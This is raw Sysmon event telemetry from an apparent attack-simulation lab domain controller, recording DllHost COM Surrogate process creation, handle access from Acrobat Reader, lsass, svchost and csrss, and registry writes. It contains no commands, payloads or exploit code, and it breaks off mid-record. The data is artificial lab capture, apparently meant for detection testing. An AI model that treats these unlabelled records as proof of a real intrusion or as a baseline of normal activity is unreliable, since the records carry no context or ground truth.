12:30:23.886{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E9-0000-0000-C000-000000000046} 0xFFFFBinary Data 10341000x800000000000000047478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.886{FE4C2B44-E64A-63C7-8706-00000000AF02}14005968C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\wow64.dll+244af|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f2cc(wow64)|C:\Windows\System32\RPCRT4.dll+64db0(wow64)|C:\Windows\System32\RPCRT4.dll+663cf(wow64)|C:\Windows\System32\combase.dll+9f27e(wow64)|C:\Windows\System32\combase.dll+71e92(wow64)|C:\Windows\System32\combase.dll+728a1(wow64)|C:\Windows\System32\combase.dll+729c0(wow64)|C:\Windows\System32\combase.dll+bfab2(wow64)|C:\Windows\System32\combase.dll+bf5b1(wow64)|C:\Windows\System32\combase.dll+a35a1(wow64)|C:\Windows\System32\combase.dll+101ced(wow64)|C:\Windows\System32\combase.dll+a0668(wow64)|C:\Windows\System32\combase.dll+a17d2(wow64)|C:\Windows\System32\combase.dll+1fda3(wow64)|C:\Windows\System32\RPCRT4.dll+5afd(wow64)|C:\Windows\System32\combase.dll+230a9(wow64) 10341000x800000000000000047477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.886{FE4C2B44-E64A-63C7-8706-00000000AF02}14005968C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\wow64.dll+244af|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f2cc(wow64)|C:\Windows\System32\RPCRT4.dll+64db0(wow64)|C:\Windows\System32\RPCRT4.dll+663cf(wow64)|C:\Windows\System32\combase.dll+9f27e(wow64)|C:\Windows\System32\combase.dll+71e92(wow64)|C:\Windows\System32\combase.dll+728a1(wow64)|C:\Windows\System32\combase.dll+729c0(wow64)|C:\Windows\System32\combase.dll+bfab2(wow64)|C:\Windows\System32\combase.dll+bf5b1(wow64)|C:\Windows\System32\combase.dll+a35a1(wow64)|C:\Windows\System32\combase.dll+101ced(wow64)|C:\Windows\System32\combase.dll+a0668(wow64)|C:\Windows\System32\combase.dll+a17d2(wow64)|C:\Windows\System32\combase.dll+1fda3(wow64)|C:\Windows\System32\RPCRT4.dll+5afd(wow64)|C:\Windows\System32\combase.dll+230a9(wow64) 13241300x800000000000000047476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:23.870{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3EA48300-8CF6-101B-84FB-666CCB9BCD32} {000214E9-0000-0000-C000-000000000046} 0xFFFFBinary Data 10341000x800000000000000047475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.870{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.569{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.568{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.568{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.567{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.567{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.567{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 13241300x800000000000000047468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:23.517{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1F2E5C40-9550-11CE-99D2-00AA006E086C} {000214E9-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000047467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:23.439{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7444C719-39BF-11D1-8CD9-00C04FC29D45} {000214E9-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000047466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:23.418{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E9-0000-0000-C000-000000000046} 0xFFFFBinary Data 10341000x800000000000000047465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.388{FE4C2B44-E65F-63C7-9206-00000000AF02}66725788C:\Windows\SysWOW64\DllHost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\shell32.dll+130450(wow64)|C:\Windows\System32\shell32.dll+130007(wow64)|C:\Windows\System32\shell32.dll+12fe3e(wow64)|C:\Windows\System32\shell32.dll+12f196(wow64)|C:\Windows\System32\shell32.dll+301998(wow64)|C:\Windows\System32\shell32.dll+30164b(wow64)|C:\Windows\System32\shell32.dll+301c40(wow64)|C:\Windows\System32\shell32.dll+1793fb(wow64)|C:\Windows\System32\shell32.dll+178eb8(wow64)|C:\Windows\System32\shell32.dll+178ded(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x800000000000000047464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.388{FE4C2B44-E65F-63C7-9206-00000000AF02}66725788C:\Windows\SysWOW64\DllHost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\shell32.dll+130442(wow64)|C:\Windows\System32\shell32.dll+130007(wow64)|C:\Windows\System32\shell32.dll+12fe3e(wow64)|C:\Windows\System32\shell32.dll+12f196(wow64)|C:\Windows\System32\shell32.dll+301998(wow64)|C:\Windows\System32\shell32.dll+30164b(wow64)|C:\Windows\System32\shell32.dll+301c40(wow64)|C:\Windows\System32\shell32.dll+1793fb(wow64) 10341000x800000000000000047463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.388{FE4C2B44-E65F-63C7-9206-00000000AF02}66725788C:\Windows\SysWOW64\DllHost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\shell32.dll+130442(wow64)|C:\Windows\System32\shell32.dll+130007(wow64)|C:\Windows\System32\shell32.dll+12fe3e(wow64)|C:\Windows\System32\shell32.dll+12f196(wow64)|C:\Windows\System32\shell32.dll+301998(wow64)|C:\Windows\System32\shell32.dll+30164b(wow64)|C:\Windows\System32\shell32.dll+301c40(wow64)|C:\Windows\System32\shell32.dll+1793fb(wow64)|C:\Windows\System32\shell32.dll+178eb8(wow64) 10341000x800000000000000047462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.358{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.358{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.352{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.345{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.339{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.338{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{448AEE3B-DC65-4AF6-BF5F-DCE86D62B6C7}C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000047451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.321{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader 